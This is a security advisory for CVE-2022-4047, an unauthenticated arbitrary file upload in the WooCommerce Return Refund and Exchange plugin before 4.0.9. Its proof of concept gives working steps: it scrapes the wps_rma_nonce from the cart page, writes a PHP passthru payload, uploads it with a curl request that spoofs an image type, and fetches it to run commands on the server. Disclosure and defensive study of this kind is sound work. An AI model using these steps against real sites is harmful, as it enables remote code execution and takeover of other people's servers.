Return Refund and Exchange For WooCommerce < 4.0.9 – Unauthenticated Arbitrary File Upload | CVE 2022-4047

Description

The plugin does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE

Proof of Concept

1. Install and activate woocommerce (dependency, no setup required)
2. Install and activate the vulnerable plugin
3. As an unauthenticated user, navigate to the "Cart" page at /cart/ (this page should exist because of woocommerce)
4. Extract the plugin's nonce from the page source (CTRL+F for "wps_rma_nonce")
5. Prepare a payload:

echo '<?php passthru("id"); ?>' > /tmp/payload.php

6. Invoke the following curl command, with the previously extracted nonce, to upload the payload:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_rma_return_upload_files&security_check=<NONCE>' \
    -F 'wps_rma_return_request_order=prefix' \
    -F 'wps_rma_return_request_files[]=@/tmp/payload.php;type=image/jpeg'

7. Trigger the payload, it should have been uploaded to /wp-content/attachment/<value of wps_rma_return_request_order>-<filename>:

curl https://example.com/wp-content/attachment/prefix-payload.php